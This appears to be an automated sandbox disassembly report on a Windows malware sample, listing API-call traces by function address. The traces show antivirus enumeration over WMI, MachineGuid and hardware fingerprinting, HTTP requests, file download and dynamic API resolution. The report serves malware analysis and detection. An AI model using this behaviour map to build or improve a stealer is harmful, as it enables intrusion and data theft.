                                                                                                                                                                                                • memset.MSVCRT ref: 00406DE6
                                                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00406E0B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4187064601-0
                                                                                                                                                                                                • Opcode ID: 4d6e2d4a90ca7b1422deb661cb4dcf1ab7c7ff220bc24bca7bcae24a37c0bf1d
                                                                                                                                                                                                • Instruction ID: f974eaa0e883c742969b18ff7bec121f05571edb8c267939f240b2802200c6b0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d6e2d4a90ca7b1422deb661cb4dcf1ab7c7ff220bc24bca7bcae24a37c0bf1d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 16226A71800158EADF05EBE6DD46EEEBB75AF25308F10447EF402721E2DB791A18DB26
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040F7B0
                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,0042555C,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000), ref: 0040F7C0
                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,0042555C), ref: 0040F7D1
                                                                                                                                                                                                • CoCreateInstance.OLE32(00427238,00000000,00000001,00427168,?,?,?,?,?,?,?,0042555C,00000000,?,Work Dir: In memory,00000000), ref: 0040F7EB
                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,?,0042555C,00000000), ref: 0040F821
                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0040F87C
                                                                                                                                                                                                  • Part of subcall function 0040F711: CoCreateInstance.OLE32(00426FE8,00000000,00000001,004253C8,00000000,?), ref: 0040F731
                                                                                                                                                                                                  • Part of subcall function 0040F711: SysAllocString.OLEAUT32(00000000), ref: 0040F73F
                                                                                                                                                                                                  • Part of subcall function 0040F711: _wtoi64.MSVCRT ref: 0040F781
                                                                                                                                                                                                  • Part of subcall function 0040F711: SysFreeString.OLEAUT32(?), ref: 0040F796
                                                                                                                                                                                                  • Part of subcall function 0040F711: SysFreeString.OLEAUT32(00000000), ref: 0040F799
                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042555C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F8B3
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,?,?,?,0042555C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F8BF
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,0042555C,00000000,?,Work Dir: In memory,00000000,?,00425544), ref: 0040F8C6
                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0040F908
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040F8F2
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prologInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

Control-flow Graph (image not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00404F66
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00403A76: _EH_prolog.MSVCRT ref: 00403A7B
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AAD
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB6
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABF
                                                                                                                                                                                                  • Part of subcall function 00403A76: lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403AD9
                                                                                                                                                                                                  • Part of subcall function 00403A76: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403AE9
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404FC9
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?), ref: 00404FDD
                                                                                                                                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405000
                                                                                                                                                                                                • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405036
                                                                                                                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040505A
                                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405065
                                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405083
                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405109
                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00405114
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 0040511D
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00405126
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                                                                • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

Control-flow Graph (image not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040F939
                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000,?,00000000), ref: 0040F949
                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00425544), ref: 0040F95A
                                                                                                                                                                                                • CoCreateInstance.OLE32(00427238,00000000,00000001,00427168,?,?,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000,?,00000000), ref: 0040F974
                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000), ref: 0040F9AA
                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0040F9F9
                                                                                                                                                                                                  • Part of subcall function 0040FC78: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,0040FA1F,?,?,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000,?,00000000), ref: 0040FC80
                                                                                                                                                                                                  • Part of subcall function 0040FC78: CharToOemW.USER32(?,00000000), ref: 0040FC8C
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0040FA2D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                • String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040F0C3
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042520F,00000000,00000000), ref: 0040F10B
                                                                                                                                                                                                • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 0040F155
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040F17F
                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0040F19C
                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040F1C6
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 0040F1DB
                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00425240), ref: 0040F25B
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                                                                                                                                                                                • String ID: - $%s\%s$?
                                                                                                                                                                                                • API String ID: 404191982-3278919252
                                                                                                                                                                                                • Opcode ID: c06cfcfae5a37de0842664defd792e232726c9a30beafe6f8d78b12eb778a3f4
                                                                                                                                                                                                • Instruction ID: bc6ea1ab7ec491c9c8a763c8a3cf3f918ce4c176d8494a98fb0cea41cd146feb
                                                                                                                                                                                                • Opcode Fuzzy Hash: c06cfcfae5a37de0842664defd792e232726c9a30beafe6f8d78b12eb778a3f4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 567104B580022DEEDF11DBA1CD84EEEBBBDBF18304F10457AE505B2191DB395A08CB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040F52F
                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,00000000), ref: 0040F552
                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040F584
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F5C7
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0040F5CE
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040F5FA
                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,004251E8), ref: 0040F609
                                                                                                                                                                                                  • Part of subcall function 0040F4EF: GetCurrentHwProfileA.ADVAPI32(?), ref: 0040F500
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040F628
                                                                                                                                                                                                  • Part of subcall function 0041013F: malloc.MSVCRT ref: 0041014D
                                                                                                                                                                                                  • Part of subcall function 0041013F: strncpy.MSVCRT ref: 0041015D
                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0040F655
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                • String ID: :\$C
                                                                                                                                                                                                • API String ID: 688099012-3309953409
                                                                                                                                                                                                • Opcode ID: 0f2ae8ea9575aef42821af1430ad55aa2078cc07246cf39224e5c4fd927df027
                                                                                                                                                                                                • Instruction ID: 9dfbfffdbf2ddaf657f2e54b89b70d54b85bf8aac276decc1d14e9baaa7bd669
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f2ae8ea9575aef42821af1430ad55aa2078cc07246cf39224e5c4fd927df027
                                                                                                                                                                                                • Instruction Fuzzy Hash: F0416A71C01118AACB11EBE6DD89DEFBBB9EF59704F10047EF901B3142DA384A09CBA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0041204B
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00404F61: _EH_prolog.MSVCRT ref: 00404F66
                                                                                                                                                                                                  • Part of subcall function 00404F61: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404FC9
                                                                                                                                                                                                  • Part of subcall function 00404F61: StrCmpCA.SHLWAPI(?), ref: 00404FDD
                                                                                                                                                                                                  • Part of subcall function 00404F61: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405000
                                                                                                                                                                                                  • Part of subcall function 00404F61: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405036
                                                                                                                                                                                                  • Part of subcall function 00404F61: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040505A
                                                                                                                                                                                                  • Part of subcall function 00404F61: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405065
                                                                                                                                                                                                  • Part of subcall function 00404F61: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405083
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004120CD
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 004120E4
                                                                                                                                                                                                  • Part of subcall function 0040FD58: LocalAlloc.KERNEL32(00000040,004120FA,00000001,00000000,?,004120F9,00000000,00000000), ref: 0040FD71
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,00000000), ref: 0041210B
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00412120
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0041213B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                • API String ID: 3807055897-1526165396
                                                                                                                                                                                                • Opcode ID: ac02564c219586449912e50da6d9ac6e3c745d53a9813d04f84db680ce203be5
                                                                                                                                                                                                • Instruction ID: 66083b9e844cd680733755929d09a5d117d1feb15589e886b9e09f68fc8bf6fd
                                                                                                                                                                                                • Opcode Fuzzy Hash: ac02564c219586449912e50da6d9ac6e3c745d53a9813d04f84db680ce203be5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4641B6B1800258AACB11FBB2C946FEE7BB4AF15304F50446FF501B3282DB785F18C669
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00404E06
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00403A76: _EH_prolog.MSVCRT ref: 00403A7B
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AAD
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB6
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABF
                                                                                                                                                                                                  • Part of subcall function 00403A76: lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403AD9
                                                                                                                                                                                                  • Part of subcall function 00403A76: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403AE9
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E55
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?), ref: 00404E6F
                                                                                                                                                                                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E93
                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404EB4
                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00404EDB
                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404EFF
                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00404F19
                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404F20
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00404F29
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2737972104-0
                                                                                                                                                                                                • Opcode ID: 789fadb869290a8cac76a952fa475ee3c379c0fd38a39066651882516cb048f3
                                                                                                                                                                                                • Instruction ID: c30001f37dfef2ba3a62dc7abc4d62383111a9d041917fc10e11156dbfb6defe
                                                                                                                                                                                                • Opcode Fuzzy Hash: 789fadb869290a8cac76a952fa475ee3c379c0fd38a39066651882516cb048f3
                                                                                                                                                                                                • Instruction Fuzzy Hash: B4412BB1900219AFDB10EBA1DC86EEF7BBDEB45304F10443AF611B2191E7385A45DBA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040DD8D
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040DDCE
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040DE43
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040DF5F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 0040C481: _EH_prolog.MSVCRT ref: 0040C486
                                                                                                                                                                                                  • Part of subcall function 0040A9CD: _EH_prolog.MSVCRT ref: 0040A9D2
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000), ref: 0040E015
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000), ref: 0040E089
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy
                                                                                                                                                                                                • String ID: Stable\$ Stable\
                                                                                                                                                                                                • API String ID: 2120869262-4033978473
                                                                                                                                                                                                • Opcode ID: c1495879ff8cf3d8f166f597e6518a8f4bd9861bf53bb9e785a016e65547f3ef
                                                                                                                                                                                                • Instruction ID: 39234b0675f3014c4c9e49e3ec6ca5165c6a2cf47cf458f9d85aae2044e49338
                                                                                                                                                                                                • Opcode Fuzzy Hash: c1495879ff8cf3d8f166f597e6518a8f4bd9861bf53bb9e785a016e65547f3ef
                                                                                                                                                                                                • Instruction Fuzzy Hash: A1D19770D00249EADF00EBBAD946BDEBFB4AF15304F10446EE84577282DB785718CBA6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406262
                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3869837436-0
                                                                                                                                                                                                • Opcode ID: 0bc206bb0d39ca1d6bd887a7afb13499fe0583c39eeede592551b7768891eff4
                                                                                                                                                                                                • Instruction ID: 9d9e751b5235763514e2182f58e510e1fdeb6aca53789148066bf4609c63ef2f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bc206bb0d39ca1d6bd887a7afb13499fe0583c39eeede592551b7768891eff4
                                                                                                                                                                                                • Instruction Fuzzy Hash: AA217970900204ABDB21EFA5CC48EAFBBB9FB85710F20056EF952F22D0D7388951CB64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040F488
                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,0042548E,?,?,00000000), ref: 0040F4A4
                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(0042548E,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0040F4C3
                                                                                                                                                                                                • CharToOemA.USER32(?,?), ref: 0040F4E0
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CharOpenQueryValuememset
                                                                                                                                                                                                • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                • API String ID: 1728412123-1211650757
                                                                                                                                                                                                • Opcode ID: 02d94da84b45a5bc20e3c930cd2c0627a20dac127c7278667ec9a0451b1acaad
                                                                                                                                                                                                • Instruction ID: 90300627fe78503570c6aac238b46943bd26772eb519af82a61773519d7520d2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 02d94da84b45a5bc20e3c930cd2c0627a20dac127c7278667ec9a0451b1acaad
                                                                                                                                                                                                • Instruction Fuzzy Hash: F301E17594421DFEEB50DB90DC85EEAB77CAB14744F1001E1A645A2051E6745E888F64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000,?,Windows: ,00000000,?,0042555C,00000000,?,Work Dir: In memory,00000000,?,00425544), ref: 0040EF7E
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040EF85
                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 0040EFA5
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040EFCB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                • String ID: %d MB$@
                                                                                                                                                                                                • API String ID: 3644086013-3474575989
                                                                                                                                                                                                • Opcode ID: fd0e751e240304ba7d829f0ca1267b82a4dd9d406921b7e0cc4cd899e75fcadd
                                                                                                                                                                                                • Instruction ID: d4ae09faefcb36e180699abcc9b5883cfb19ecae6e5fbbedd1348e0d70c088e6
                                                                                                                                                                                                • Opcode Fuzzy Hash: fd0e751e240304ba7d829f0ca1267b82a4dd9d406921b7e0cc4cd899e75fcadd
                                                                                                                                                                                                • Instruction Fuzzy Hash: 55F01DB5A40218ABEB009BA5DD4AF6E76AEE745705F404429F702E62C0EAB8D8058665
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 004162FE
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 0041630A
                                                                                                                                                                                                  • Part of subcall function 004162F9: LoadLibraryA.KERNEL32(The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser,0041622B), ref: 00416316
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 00416326
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 00416332
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 0041634A
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 00416356
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 00416376
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 00416380
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 00416394
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004163AB
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004163C2
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004163D9
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004163F0
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 00416407
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 0041641E
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 00416435
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 0041644C
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 00416463
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 0041647A
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 00416491
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004164A8
